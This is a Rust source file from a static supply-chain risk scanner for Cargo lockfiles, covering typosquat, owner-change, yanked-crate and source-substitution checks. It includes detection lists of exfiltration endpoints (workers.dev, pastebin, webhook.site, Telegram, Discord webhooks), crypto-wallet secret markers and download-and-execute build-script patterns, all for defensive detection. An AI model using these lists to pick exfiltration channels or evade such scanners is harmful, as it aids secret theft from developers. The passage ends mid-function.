Skip to main content

rustinel_core/
signals.rs

1use crate::errors::RustinelError;
2use crate::lockfile::{LockfileModel, Package};
3use crate::AnalysisOptions;
4use serde::{Deserialize, Serialize};
5use std::path::{Path, PathBuf};
6
/// One piece of supporting evidence attached to a [`RiskSignal`].
///
/// Serialized with serde. `path` is omitted from the serialized form entirely
/// when it is `None` (see the `skip_serializing_if` attribute on that field).
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Evidence {
    /// Free-form category tag. Values produced in this module include
    /// `"path"`, `"registry"`, `"source"`, `"policy"`, `"lockfile"` and
    /// `"heuristic"`.
    pub kind: String,
    /// Optional location the evidence refers to (for example the lockfile
    /// path); `None` when the evidence is not tied to a file.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub path: Option<String>,
    /// Human-readable description of what was observed.
    pub summary: String,
}
14
15impl Evidence {
16    pub fn new(kind: &str, summary: impl Into<String>) -> Self {
17        Self {
18            kind: kind.into(),
19            path: None,
20            summary: summary.into(),
21        }
22    }
23
24    pub fn with_path(kind: &str, path: impl Into<String>, summary: impl Into<String>) -> Self {
25        Self {
26            kind: kind.into(),
27            path: Some(path.into()),
28            summary: summary.into(),
29        }
30    }
31}
32
/// A single risk finding about one locked package.
///
/// Findings are ordered for output by [`sort_signals`]: severity (descending),
/// then `id`, then `package`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct RiskSignal {
    /// Machine-readable identifier of the check that fired, e.g.
    /// `"owners_changed"`, `"yanked_crate"` or `"possible_typosquat"`.
    pub id: String,
    /// The affected package, written as the string form of its package id.
    /// `annotate_dependency_paths` treats the text before the first `@` as the
    /// crate name.
    pub package: String,
    /// How serious the finding is; the primary sort key.
    pub severity: Severity,
    /// Contribution of this finding to a score. NOTE(review): the scoring itself
    /// is not in this part of the file; `denied_crate` deliberately uses `0` so
    /// that it drives the decision rather than the score.
    pub weight: u8,
    /// How sure the check is about the finding. Values assigned in this module
    /// lie between `0.3` and `1.0` — presumably a `0.0..=1.0` scale, confirm
    /// against the consumer.
    pub confidence: f32,
    /// Supporting observations. `annotate_dependency_paths` may append an extra
    /// `kind = "path"` entry after collection.
    pub evidence: Vec<Evidence>,
    /// Human-readable suggested next step for the reader of the report.
    pub recommendation: String,
}
43
/// Severity level of a [`RiskSignal`].
///
/// The variants are declared from least to most severe, and the derived
/// `PartialOrd`/`Ord` follow declaration order (`Info < Low < … < Critical`).
/// `sort_signals` and `annotate_dependency_paths` both compare severities, so
/// reordering the variants changes their behavior.
///
/// Serialized in `snake_case` (`"info"`, `"low"`, …).
#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, PartialOrd, Ord)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    /// Lowest level; `annotate_dependency_paths` skips findings at this level.
    Info,
    Low,
    Medium,
    High,
    /// Highest level.
    Critical,
}
53
54impl Severity {
55    pub fn as_str(&self) -> &'static str {
56        match self {
57            Severity::Info => "info",
58            Severity::Low => "low",
59            Severity::Medium => "medium",
60            Severity::High => "high",
61            Severity::Critical => "critical",
62        }
63    }
64}
65
/// Collect static, metadata-based risk signals for a lockfile.
///
/// Security invariant: this function only *reads* files. It never executes
/// `build.rs`, never compiles, and never runs dependency code.
///
/// Runs every lockfile / metadata collector, then the source-level collector
/// (only when `options.source_root()` yields a value), and finally
/// post-processes the combined list: known-good baseline, dependency-path
/// annotation, deterministic sort.
///
/// # Errors
///
/// Propagates the [`RustinelError`] returned by `collect_source_signals`. The
/// other collectors are called without error handling and cannot fail this
/// function.
pub fn collect_basic_signals(
    lock: &LockfileModel,
    options: &AnalysisOptions,
) -> Result<Vec<RiskSignal>, RustinelError> {
    let mut signals = Vec::new();

    // Lockfile- and metadata-driven collectors; each appends to `signals`.
    collect_multiple_versions(lock, &mut signals);
    collect_name_heuristics(lock, &mut signals);
    collect_typosquat(lock, options, &mut signals);
    collect_source_substitution(lock, &mut signals);
    collect_freshness(lock, options, &mut signals);
    collect_owners_changed(lock, options, &mut signals);
    collect_yanked(lock, options, &mut signals);
    collect_denied(lock, options, &mut signals);

    // Source-level scan is optional: it needs a source root to read from.
    if let Some(source_root) = options.source_root() {
        collect_source_signals(lock, &source_root, &mut signals)?;
    }

    // Post-processing runs on the complete list. NOTE(review): the baseline
    // helper is defined outside this view; it runs before path annotation and
    // before the final sort, so keep this order unless that helper is checked.
    apply_known_good_baseline(&mut signals);
    annotate_dependency_paths(lock, &mut signals);
    sort_signals(&mut signals);
    Ok(signals)
}
94
95/// Attach the "why is this here" dependency path to each actionable finding as
96/// an extra evidence entry (`kind = "path"`). Purely informational; skipped for
97/// Info-level (baseline/declared-license) findings to avoid noise.
98fn annotate_dependency_paths(lock: &LockfileModel, signals: &mut [RiskSignal]) {
99    let paths = crate::graph::dependency_paths(lock);
100    for signal in signals.iter_mut() {
101        if signal.severity <= Severity::Info {
102            continue;
103        }
104        let name = signal.package.split('@').next().unwrap_or(&signal.package);
105        if let Some(path) = paths.get(name) {
106            if path.len() >= 2 {
107                signal.evidence.push(Evidence::new(
108                    "path",
109                    format!("pulled in via: {}", crate::graph::format_path(path)),
110                ));
111            }
112        }
113    }
114}
115
116/// Emit a signal when a dependency's *current* crates.io owners differ from the
117/// trusted baseline (`rustinel-trust.toml`). A newly-added maintainer is the
118/// supply-chain takeover vector behind the xz and event-stream attacks — and a
119/// database-only scanner is blind to it, because no advisory exists until long
120/// after the attack lands.
121fn collect_owners_changed(
122    lock: &LockfileModel,
123    options: &AnalysisOptions,
124    signals: &mut Vec<RiskSignal>,
125) {
126    if options.trusted_owners.is_empty() {
127        return;
128    }
129    let mut done = std::collections::BTreeSet::new();
130    for package in lock.registry_packages() {
131        // Ownership lives on the crates.io crate; a git / alt-registry package
132        // that merely shares a name must not be matched against the baseline.
133        if !package.id.is_crates_io() {
134            continue;
135        }
136        let name = package.id.name.as_str();
137        // Owners are crate-level; emit at most one signal per crate name. We mark
138        // a name "done" only once we have owner metadata for it, so a version
139        // that lacks metadata never short-circuits a later version that has it.
140        if done.contains(name) {
141            continue;
142        }
143        let Some(trusted) = options.trusted_owners.get(name) else {
144            continue;
145        };
146        let Some(meta) = options.metadata.get(&package.id.to_string()) else {
147            continue;
148        };
149        if meta.owners.is_empty() {
150            continue;
151        }
152        done.insert(name.to_string());
153        let current: std::collections::BTreeSet<&str> =
154            meta.owners.iter().map(String::as_str).collect();
155        let baseline: std::collections::BTreeSet<&str> =
156            trusted.iter().map(String::as_str).collect();
157        if current == baseline {
158            continue;
159        }
160        let added: Vec<&str> = current.difference(&baseline).copied().collect();
161        let removed: Vec<&str> = baseline.difference(&current).copied().collect();
162        let mut parts = Vec::new();
163        if !added.is_empty() {
164            parts.push(format!("new owner(s): {}", added.join(", ")));
165        }
166        if !removed.is_empty() {
167            parts.push(format!("removed owner(s): {}", removed.join(", ")));
168        }
169        signals.push(RiskSignal {
170            id: "owners_changed".into(),
171            package: package.id.to_string(),
172            severity: Severity::Medium,
173            weight: 20,
174            confidence: 1.0,
175            evidence: vec![Evidence::new(
176                "registry",
177                format!(
178                    "crates.io owners changed since trusted ({}) — a new maintainer is the supply-chain takeover vector (xz, event-stream)",
179                    parts.join("; ")
180                ),
181            )],
182            recommendation:
183                "Verify the ownership change is legitimate, then refresh the baseline with `cargo rustinel trust`."
184                    .into(),
185        });
186    }
187}
188
189/// Flag a *popular* crate name that resolves from a non-crates.io source. A
190/// `serde` or `tokio` pulled from a git fork or a private / alternate registry is
191/// sometimes an intended patch — but it is also the dependency-confusion /
192/// source-substitution vector, where an attacker shadows a trusted name with
193/// their own build. cargo-audit, which only matches crates.io packages, is blind
194/// to it entirely.
195fn collect_source_substitution(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
196    for package in lock.registry_packages() {
197        let name = package.id.name.as_str();
198        if !POPULAR_CRATES.contains(&name) {
199            continue;
200        }
201        if package.id.is_crates_io() {
202            continue;
203        }
204        let source = package.id.source.as_deref().unwrap_or("an unknown source");
205        signals.push(RiskSignal {
206            id: "source_substitution".into(),
207            package: package.id.to_string(),
208            severity: Severity::Medium,
209            weight: 18,
210            confidence: 0.7,
211            evidence: vec![Evidence::new(
212                "source",
213                format!(
214                    "the popular crate `{name}` resolves from a non-crates.io source ({source}) — \
215                     verify this is an intended fork or mirror, not a dependency-confusion substitution"
216                ),
217            )],
218            recommendation:
219                "Confirm why a well-known crate name comes from a non-crates.io source. If it is \
220                 not an intentional patch, this is the dependency-confusion vector — pin the \
221                 crates.io source."
222                    .into(),
223        });
224    }
225}
226
227/// Emit `yanked_crate` signals for any locked package the caller flagged as
228/// yanked. Yanked status is registry truth (not a heuristic), so it is never
229/// suppressed by the known-good baseline.
230fn collect_yanked(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
231    if options.yanked.is_empty() {
232        return;
233    }
234    for package in lock.registry_packages() {
235        // Yanked status was fetched from crates.io and keyed by bare name@version;
236        // a git/alt-registry crate sharing that id is a different package.
237        if !package.id.is_crates_io() {
238            continue;
239        }
240        let id = package.id.to_string();
241        if options.yanked.contains(&id) {
242            signals.push(RiskSignal {
243                id: "yanked_crate".into(),
244                package: id,
245                severity: Severity::Medium,
246                weight: 25,
247                confidence: 1.0,
248                evidence: vec![Evidence::new(
249                    "registry",
250                    "this exact version has been yanked from the registry",
251                )],
252                recommendation: "Update to a non-yanked version, or replace this dependency."
253                    .into(),
254            });
255        }
256    }
257}
258
259/// Emit a `denied_crate` signal for every locked package whose crate name is on
260/// the policy `deny.crates` list. Driven from the dependency set (not from other
261/// signals), so an explicit deny is honored even when the crate is otherwise
262/// unremarkable — a name-based deny is the operator's strongest control and must
263/// never silently no-op. Weight 0: it drives the *decision*, not the score.
264fn collect_denied(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
265    let Some(policy) = &options.policy else {
266        return;
267    };
268    let Some(deny) = &policy.deny else {
269        return;
270    };
271    if deny.crates.is_empty() {
272        return;
273    }
274    for package in lock.registry_packages() {
275        if deny.crates.iter().any(|c| c == &package.id.name) {
276            signals.push(RiskSignal {
277                id: "denied_crate".into(),
278                package: package.id.to_string(),
279                severity: Severity::High,
280                weight: 0,
281                confidence: 1.0,
282                evidence: vec![Evidence::new(
283                    "policy",
284                    format!("`{}` is on the policy deny list", package.id.name),
285                )],
286                recommendation: "Remove this dependency, or remove it from the policy deny list."
287                    .into(),
288            });
289        }
290    }
291}
292
293/// Stable ordering: severity desc, then signal id, then package — so that JSON
294/// and Markdown output is deterministic regardless of discovery order.
295pub fn sort_signals(signals: &mut [RiskSignal]) {
296    signals.sort_by(|a, b| {
297        b.severity
298            .cmp(&a.severity)
299            .then_with(|| a.id.cmp(&b.id))
300            .then_with(|| a.package.cmp(&b.package))
301    });
302}
303
304fn collect_multiple_versions(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
305    for (name, packages) in lock.by_name() {
306        // Only registry packages can legitimately appear in multiple versions.
307        let registry: Vec<&&Package> = packages.iter().filter(|p| !p.id.is_local()).collect();
308        if registry.len() > 1 {
309            for package in &registry {
310                signals.push(RiskSignal {
311                    id: "multiple_versions_same_crate".into(),
312                    package: package.id.to_string(),
313                    severity: Severity::Low,
314                    weight: 3,
315                    confidence: 1.0,
316                    evidence: vec![Evidence::with_path(
317                        "lockfile",
318                        lock.path.display().to_string(),
319                        format!(
320                            "{} distinct versions of `{name}` are present",
321                            registry.len()
322                        ),
323                    )],
324                    recommendation: "Consider deduplicating dependency versions where feasible."
325                        .into(),
326                });
327            }
328        }
329    }
330}
331
332fn collect_name_heuristics(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
333    for package in lock.registry_packages() {
334        if package.id.name.ends_with("-sys") {
335            // Name-only FFI is a weak signal: most `-sys` crates are benign,
336            // ubiquitous platform bindings. Start Low; the manifest-confirmed
337            // `links` path (in collect_source_signals) escalates to Medium.
338            signals.push(RiskSignal {
339                id: "native_ffi_detected".into(),
340                package: package.id.to_string(),
341                severity: Severity::Low,
342                weight: 8,
343                confidence: 0.6,
344                evidence: vec![Evidence::new(
345                    "heuristic",
346                    "crate name ends with `-sys`, a convention for native/FFI bindings",
347                )],
348                recommendation:
349                    "Review the native dependency and its build process before merging.".into(),
350            });
351        }
352    }
353}
354
/// High-profile crates frequently impersonated by typosquats. A dependency one
/// edit away from one of these (but not itself on the list) is a likely
/// typosquat. Curated, not exhaustive — extend as the ecosystem shifts.
///
/// The list is consulted in two ways in this module:
/// - by the typosquat check, both as the set of impersonation targets and as
///   the set of names that are never themselves flagged;
/// - by `collect_source_substitution`, as the set of well-known names whose
///   resolution from a non-crates.io source is reported.
///
/// Entry order is significant: `nearest_popular` returns the *first* entry at
/// edit distance 1, so reordering can change which target a finding names.
pub const POPULAR_CRATES: &[&str] = &[
    "serde",
    "serde_json",
    "serde_derive",
    "tokio",
    "tokio-util",
    "reqwest",
    "hyper",
    "rand",
    "regex",
    "syn",
    "quote",
    "proc-macro2",
    "libc",
    "log",
    "env_logger",
    "tracing",
    "tracing-subscriber",
    "anyhow",
    "thiserror",
    "clap",
    "futures",
    "bytes",
    "chrono",
    "time",
    "uuid",
    "itertools",
    "rayon",
    "crossbeam",
    "parking_lot",
    "once_cell",
    "lazy_static",
    "base64",
    "hex",
    "sha2",
    "sha1",
    "md5",
    "digest",
    "hmac",
    "aes",
    // Legitimate, widely-used crates that happen to sit one edit away from a
    // popular crate above (`mime`↔`time`, `md-5`↔`md5`, `anes`↔`aes`). Listing
    // them as known-good prevents false-positive typosquat flags on the real
    // crate, while still letting a genuine typosquat *of these* be caught.
    "mime",
    "md-5",
    "anes",
    // The note above covers only the three names directly beneath it; the
    // entries from here on are ordinary popular crates again.
    "rustls",
    "ring",
    "openssl",
    "openssl-sys",
    "native-tls",
    "url",
    "http",
    "h2",
    "mio",
    "socket2",
    "num",
    "num-traits",
    "num-bigint",
    "bitflags",
    "cfg-if",
    "memchr",
    "smallvec",
    "indexmap",
    "hashbrown",
    "ahash",
    "toml",
    "serde_yaml",
    "csv",
    "flate2",
    "zip",
    "tar",
    "walkdir",
    "tempfile",
    "dirs",
    "which",
    "semver",
    "git2",
    "nix",
    "winapi",
    "windows-sys",
    "async-trait",
    "async-std",
    "actix-web",
    "axum",
    "tower",
    "diesel",
    "sqlx",
    "redis",
    "mongodb",
    "prost",
    "tonic",
    "serde_urlencoded",
    "percent-encoding",
    "idna",
    "unicode-normalization",
    "getrandom",
    "rand_core",
    "crc32fast",
    "miniz_oxide",
    "backtrace",
    "addr2line",
    "object",
    "gimli",
    "wasm-bindgen",
    "js-sys",
    "web-sys",
    // Web / async ecosystem
    "tokio-stream",
    "tower-http",
    "tonic-build",
    "tungstenite",
    "tokio-tungstenite",
    "reqwest-middleware",
    "hyper-tls",
    "hyper-util",
    "rustls-pemfile",
    "webpki-roots",
    "trust-dns-resolver",
    "warp",
    "rocket",
    "actix",
    "actix-rt",
    "async-channel",
    "futures-util",
    "futures-core",
    "pin-project",
    "pin-project-lite",
    // Serialization / data
    "bincode",
    "rmp-serde",
    "postcard",
    "serde_with",
    "serde_repr",
    "toml_edit",
    "ron",
    "quick-xml",
    "roxmltree",
    "prost-build",
    "protobuf",
    "arrow",
    "polars",
    // CLI / config / errors
    "clap_derive",
    "clap_complete",
    "structopt",
    "argh",
    "console",
    "indicatif",
    "dialoguer",
    "color-eyre",
    "eyre",
    "miette",
    "config",
    "dotenvy",
    "directories",
    // Crypto / hashing
    "blake3",
    "blake2",
    "sha3",
    "ed25519-dalek",
    "curve25519-dalek",
    "x25519-dalek",
    "rsa",
    "chacha20poly1305",
    "argon2",
    "bcrypt",
    "subtle",
    "zeroize",
    "rand_chacha",
    // Time / numbers / text
    "time-macros",
    "humantime",
    "bigdecimal",
    "rust_decimal",
    "ordered-float",
    "unicode-width",
    "unicode-segmentation",
    "aho-corasick",
    "regex-syntax",
    "fancy-regex",
    "nom",
    "pest",
    "logos",
    // Async runtimes / utils
    "async-stream",
    "dashmap",
    "flume",
    "arc-swap",
    "thread_local",
    "num_cpus",
    "rayon-core",
    "crossbeam-channel",
    "crossbeam-utils",
    // DB / storage
    "sea-orm",
    "rusqlite",
    "deadpool",
    "r2d2",
    "sled",
    "rocksdb",
    // Testing / macros
    "proptest",
    "quickcheck",
    "mockall",
    "insta",
    "criterion",
    "trybuild",
    "paste",
    "strum",
    "derive_more",
    "darling",
];
572
573/// Flag dependencies whose name is exactly one edit away from a popular crate
574/// (Damerau-Levenshtein distance 1) — a likely typosquat / impersonation. The
575/// dependency itself must not be on the popular list.
576/// Download count at or above which a crate is considered established enough
577/// that a name collision with a popular crate is almost certainly coincidental
578/// (e.g. `miow` vs `mio`) rather than a typosquat. Below it, the collision is
579/// suspicious. Corroborating with adoption is what turns a noisy edit-distance
580/// heuristic into a precise signal.
581const TYPOSQUAT_TRUST_DOWNLOADS: u64 = 10_000;
582
583fn collect_typosquat(
584    lock: &LockfileModel,
585    options: &AnalysisOptions,
586    signals: &mut Vec<RiskSignal>,
587) {
588    for package in lock.registry_packages() {
589        let name = package.id.name.as_str();
590        if POPULAR_CRATES.contains(&name) || is_known_good(name) {
591            continue;
592        }
593        // Skip very short names — distance-1 collisions are meaningless there.
594        if name.len() < 4 {
595            continue;
596        }
597        let Some(target) = nearest_popular(name) else {
598            continue;
599        };
600        // Corroborate against registry adoption. A name one edit from a popular
601        // crate is only suspicious when the crate is *also* obscure; an
602        // established crate that merely looks similar (e.g. `miow`) is not a
603        // typosquat. Without metadata we cannot tell, so we emit a quiet hint
604        // rather than a misleading Medium finding.
605        let downloads = options
606            .metadata
607            .get(&package.id.to_string())
608            .and_then(|m| m.total_downloads);
609        let base =
610            format!("crate name `{name}` is one edit away from the popular crate `{target}`");
611        let signal = match downloads {
612            // Established crate that merely looks similar — not a typosquat.
613            Some(d) if d >= TYPOSQUAT_TRUST_DOWNLOADS => continue,
614            // Name-similar AND obscure — a strong typosquat suspect.
615            Some(d) => RiskSignal {
616                id: "possible_typosquat".into(),
617                package: package.id.to_string(),
618                severity: Severity::Medium,
619                weight: 18,
620                confidence: 0.85,
621                evidence: vec![Evidence::new(
622                    "heuristic",
623                    format!("{base}, and has only {d} downloads — likely typosquat / impersonation"),
624                )],
625                recommendation:
626                    "Verify the publisher and source; this is very likely not the crate you intended."
627                        .into(),
628            },
629            // No registry metadata to corroborate (offline / --online-metadata off).
630            None => RiskSignal {
631                id: "possible_typosquat".into(),
632                package: package.id.to_string(),
633                severity: Severity::Info,
634                weight: 0,
635                confidence: 0.3,
636                evidence: vec![Evidence::new(
637                    "heuristic",
638                    format!("{base} — trust unverified offline (re-run with --online-metadata)"),
639                )],
640                recommendation:
641                    "Run with --online-metadata to corroborate against download counts before acting."
642                        .into(),
643            },
644        };
645        signals.push(signal);
646    }
647}
648
/// Versions published within this many days are flagged as freshly published —
/// the window in which a supply-chain attack lives before anyone, including the
/// advisory databases, has reviewed it.
///
/// The bound is inclusive: `collect_freshness` skips a version only when its age
/// in days is strictly greater than this value.
const FRESH_DAYS: u64 = 14;
653
654/// Emit a signal for any crates.io dependency whose *locked version* was
655/// published very recently. "New == unreviewed" — this is the proactive,
656/// pre-advisory signal that a database-only scanner (cargo-audit) cannot
657/// produce, because it exists before any advisory is ever filed.
658fn collect_freshness(
659    lock: &LockfileModel,
660    options: &AnalysisOptions,
661    signals: &mut Vec<RiskSignal>,
662) {
663    for package in lock.registry_packages() {
664        // Only crates.io packages have crates.io publish dates; a git / alt-registry
665        // package sharing a name@version must not borrow injected metadata.
666        if !package.id.is_crates_io() {
667            continue;
668        }
669        let Some(meta) = options.metadata.get(&package.id.to_string()) else {
670            continue;
671        };
672        let Some(days) = meta.published_days_ago else {
673            continue;
674        };
675        if days > FRESH_DAYS {
676            continue;
677        }
678        signals.push(RiskSignal {
679            id: "freshly_published".into(),
680            package: package.id.to_string(),
681            severity: Severity::Low,
682            weight: 6,
683            confidence: 1.0,
684            evidence: vec![Evidence::new(
685                "registry",
686                format!(
687                    "version published {days} day(s) ago — recently published code has had little time for review or for advisories to surface"
688                ),
689            )],
690            recommendation:
691                "Confirm this version bump is intended; freshly published versions are the window for supply-chain attacks."
692                    .into(),
693        });
694    }
695}
696
697/// Public selector: the popular crate this name is a possible typosquat of
698/// (Damerau-Levenshtein distance 1), if it is a candidate worth corroborating.
699///
700/// The CLI uses this to fetch registry metadata only for the handful of typosquat
701/// candidates in a lockfile, instead of querying every dependency — keeping the
702/// online lookup cheap and polite to crates.io.
703pub fn typosquat_target(name: &str) -> Option<&'static str> {
704    if POPULAR_CRATES.contains(&name) || is_known_good(name) || name.len() < 4 {
705        return None;
706    }
707    nearest_popular(name)
708}
709
710/// The first popular crate at Damerau-Levenshtein distance exactly 1, if any.
711fn nearest_popular(name: &str) -> Option<&'static str> {
712    POPULAR_CRATES
713        .iter()
714        .copied()
715        .find(|p| *p != name && damerau_levenshtein(name, p) == 1)
716}
717
/// Damerau-Levenshtein edit distance between `a` and `b`, counting insertion,
/// deletion, substitution and transposition of two adjacent symbols as one
/// edit each.
///
/// This is the restricted ("optimal string alignment") form: a transposed pair
/// is never edited again. That makes no difference for the distance-1 test this
/// module uses it for. The comparison is byte-wise, which is exact for crate
/// names because they are ASCII.
pub(crate) fn damerau_levenshtein(a: &str, b: &str) -> usize {
    let (src, dst) = (a.as_bytes(), b.as_bytes());
    if src.is_empty() || dst.is_empty() {
        // Turning an empty string into the other one takes one edit per byte.
        return src.len().max(dst.len());
    }

    let width = dst.len() + 1;
    // Three rolling rows of the DP table: the row two back (for transpositions),
    // the previous row, and the row currently being filled.
    let mut two_back = vec![0usize; width];
    let mut one_back: Vec<usize> = (0..width).collect();
    let mut row = vec![0usize; width];

    for (i, &src_byte) in src.iter().enumerate() {
        row[0] = i + 1;
        for (j, &dst_byte) in dst.iter().enumerate() {
            let substitution = one_back[j] + usize::from(src_byte != dst_byte);
            let deletion = one_back[j + 1] + 1;
            let insertion = row[j] + 1;
            let mut best = deletion.min(insertion).min(substitution);
            let swapped = i > 0 && j > 0 && src_byte == dst[j - 1] && src[i - 1] == dst_byte;
            if swapped {
                best = best.min(two_back[j - 1] + 1);
            }
            row[j + 1] = best;
        }
        // Rotate the rows: previous becomes two-back, current becomes previous,
        // and the old two-back buffer is reused for the next row.
        std::mem::swap(&mut two_back, &mut one_back);
        std::mem::swap(&mut one_back, &mut row);
    }
    one_back[width - 1]
}
748
/// Markers of anomalous build-script *intent*, scanned statically (never run).
///
/// Network access and opaque embedded payloads in a `build.rs` are strong red
/// flags — a build script should compile, not phone home or unpack a blob. We
/// deliberately do NOT flag process execution alone, because legitimate
/// native-build crates (`cc`, `cmake`, `pkg-config`) spawn the C toolchain.
///
/// This list holds the network-access markers. `env_gated_block` tests them
/// with a plain, case-sensitive substring match per line, so a short entry such
/// as `curl` or `hyper` also matches inside a longer identifier.
const BUILD_RS_NETWORK: &[&str] = &[
    "reqwest",
    "ureq",
    "hyper",
    "isahc",
    "curl",
    "TcpStream",
    "std::net",
    "minreq",
    "attohttpc",
    "tokio::net",
];
/// Markers of an opaque embedded payload or of dynamic library loading in a
/// build script: byte embedding, base64 / hex decoding, `libloading` and
/// `dlopen`. NOTE(review): the code that consumes this list is outside this
/// view; the entries are written as call forms / path fragments, which suggests
/// substring matching — confirm at the use site.
const BUILD_RS_PAYLOAD: &[&str] = &[
    "include_bytes!",
    "base64::decode",
    "STANDARD.decode",
    "from_base64",
    "hex::decode",
    "libloading::",
    // The call form, not a bare substring — otherwise a cargo feature or env-var
    // name like `source-fontconfig-dlopen` / `RUST_FONTCONFIG_DLOPEN` trips it.
    "dlopen(",
];
778
/// Markers that a runtime source file *harvests secrets*: crypto-wallet / key
/// vocabulary. Individually noisy, but decisive in conjunction with scanning the
/// user's own source files (`SOURCE_SCAN`) — the faster_log / async_println
/// malware fingerprint (Sept 2025).
///
/// Several words are listed in more than one capitalization (`base58` /
/// `Base58`, `solana` / `Solana`, …). NOTE(review): that suggests the consumer
/// matches case-sensitively — confirm at the use site, which is outside this
/// view.
const SECRET_MARKERS: &[&str] = &[
    "base58",
    "Base58",
    "private_key",
    "private key",
    "PRIVATE KEY",
    "keypair",
    "secp256k1",
    "mnemonic",
    "seed phrase",
    "solana",
    "Solana",
    "ethereum",
    "Ethereum",
    "wallet",
    // Key-format literals — catch harvesting even when the keyword vocabulary is
    // obfuscated: the base58 alphabet (Solana / BTC secrets) and an Ethereum
    // private-key regex (`0x` + 64 hex). Decisive substrings; rare in non-crypto code.
    // The first entry is a run of the base58 alphabet as it would be written in
    // source; the second is the character-class part of such a regex, without
    // the `0x` prefix.
    "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijk",
    "[0-9a-fA-F]{64}",
];
/// Markers that code walks/reads the *consuming project's* `.rs` source — almost
/// never legitimate for a runtime library.
///
/// These are generic directory-walking and file-reading API names. On their own
/// they are common in ordinary code, which is why the surrounding comments
/// describe them as meaningful only in conjunction with network or secret
/// markers in the same file.
const SOURCE_SCAN: &[&str] = &[
    "read_dir",
    "WalkDir",
    "walkdir",
    "read_to_string",
    "fs::read",
];
813
/// Pure data-exfiltration endpoints: there is no legitimate reason for a normal
/// crate to hard-code one, so a match alone is suspicious. (CF Workers, paste
/// sites, anonymous file hosts, request-capture services, tunnels.)
///
/// Background for this list and for `DUAL_USE_EXFIL_DOMAINS`: these are domain
/// classes that almost never appear in a legitimate library's *runtime*
/// source but are common data-exfiltration channels. Cloudflare Workers
/// (`*.workers.dev`) is where the faster_log crypto-stealer (Sept 2025) sent the
/// keys it harvested; Telegram, IP-geolocation, paste and webhook services are
/// the usual drop endpoints. Matched as substrings, scanned statically, never
/// executed.
///
/// Entries with a leading dot (`.workers.dev`, `.ngrok.io`) are meant to match
/// any subdomain of that suffix.
const EXFIL_HOST_DOMAINS: &[&str] = &[
    ".workers.dev",
    "pastebin.com",
    "paste.ee",
    "transfer.sh",
    "0x0.st",
    "anonfiles.com",
    "webhook.site",
    "requestbin",
    "pipedream.net",
    ".ngrok.io",
    ".ngrok-free.app",
];
836
/// Dual-use service APIs that malware abuses for exfil but that purpose-built
/// crates use legitimately (a `*-telegram` gateway hitting `api.telegram.org`, a
/// geo-IP crate hitting `ip-api.com`). A match here is only suspicious when the
/// SAME file also handles wallet/secret material — i.e. the exfil shape — so a
/// legitimate integration crate is not flagged just for talking to its service.
///
/// The Discord entries include the `/api/webhooks` path, so only webhook URLs
/// match, not every mention of the Discord domain.
const DUAL_USE_EXFIL_DOMAINS: &[&str] = &[
    "api.telegram.org",
    "ip-api.com",
    "discord.com/api/webhooks",
    "discordapp.com/api/webhooks",
];
848
849/// True when a download-and-execute sequence is *causally tight*: an env-var
850/// gate, a network call, and a process spawn all fall within a small line window
851/// (one block/function) — the rustdecimal shape, where `Decimal::new` checked an
852/// env var, fetched a payload, and ran it within a few lines. A large CLI that
853/// scatters unrelated env-config reads, an HTTP client, and a `Command` spawn
854/// across thousands of lines does NOT match — that whole-file co-presence was a
855/// false positive (e.g. a tool that reads config from env, calls an RPC, and
856/// shells out to `cargo`, none of which are related).
857fn env_gated_block(content: &str) -> bool {
858    const WINDOW: usize = 25;
859    const ENV: &[&str] = &["env::var", "var_os"];
860    const SPAWN: &[&str] = &["Command::new", "process::Command", "libc::system"];
861    let lines: Vec<&str> = content.lines().collect();
862    for (i, line) in lines.iter().enumerate() {
863        if !BUILD_RS_NETWORK.iter().any(|m| line.contains(m)) {
864            continue;
865        }
866        let lo = i.saturating_sub(WINDOW);
867        let hi = (i + WINDOW + 1).min(lines.len());
868        let window = &lines[lo..hi];
869        let gated = window.iter().any(|l| ENV.iter().any(|m| l.contains(m)));
870        let spawns = window.iter().any(|l| SPAWN.iter().any(|m| l.contains(m)));
871        if gated && spawns {
872            return true;
873        }
874    }
875    false
876}
877
/// Accumulated result of scanning a crate's source for exfiltration
/// fingerprints. `Default` yields the "nothing found" state: every sample is
/// `None` and both flags are `false`.
#[derive(Default)]
struct ExfilScan {
    /// Presumably the exfil-domain marker that matched, paired with
    /// `domain_sample` — TODO confirm against the scanner that fills it in.
    exfil_domain: Option<String>,
    /// First file matching each fingerprint, so every emitted signal cites the
    /// file it actually applies to (rather than one shared, possibly-wrong path).
    domain_sample: Option<PathBuf>,
    env_gated_sample: Option<PathBuf>,
    /// The source-exfil conjunction must hold *within one file* (a single file both
    /// reads the project's `.rs` files AND reaches the network or handles secrets),
    /// not across the crate — otherwise a codegen helper reading `.rs` in one module
    /// plus an HTTP client in an unrelated module would falsely fire the High signal.
    source_exfil_sample: Option<PathBuf>,
    /// NOTE(review): by name, whether the `source_exfil_sample` file also reached
    /// the network — confirm against the scanner that sets it.
    source_exfil_network: bool,
    /// NOTE(review): by name, whether the `source_exfil_sample` file also handled
    /// secret material — confirm against the scanner that sets it.
    source_exfil_secrets: bool,
}
893
894impl ExfilScan {
895    fn any_match(&self) -> bool {
896        self.source_exfil_sample.is_some()
897            || self.domain_sample.is_some()
898            || self.env_gated_sample.is_some()
899    }
900}
901
902/// Read a directory's entries **sorted by file name**, so any walk built on it
903/// is reproducible across filesystems (ext4 hash order, APFS, and tmpfs each
904/// return `read_dir` in a different native order). Every emitted evidence path
905/// that is selected from a directory walk — the `unsafe` sample, the
906/// source-exfil / domain / env-gated samples — depends on this for the
907/// `--no-timestamp` byte-identical-output invariant to hold across machines,
908/// not just across runs on one filesystem. A failed `read_dir` yields no
909/// entries (the caller treats that the same as an empty directory).
910fn sorted_dir_entries(dir: &Path) -> Vec<std::fs::DirEntry> {
911    let Ok(rd) = std::fs::read_dir(dir) else {
912        return Vec::new();
913    };
914    // Bound the materialized set: a single hostile directory holding millions of
915    // entries must not be collected in full before the caller's per-entry
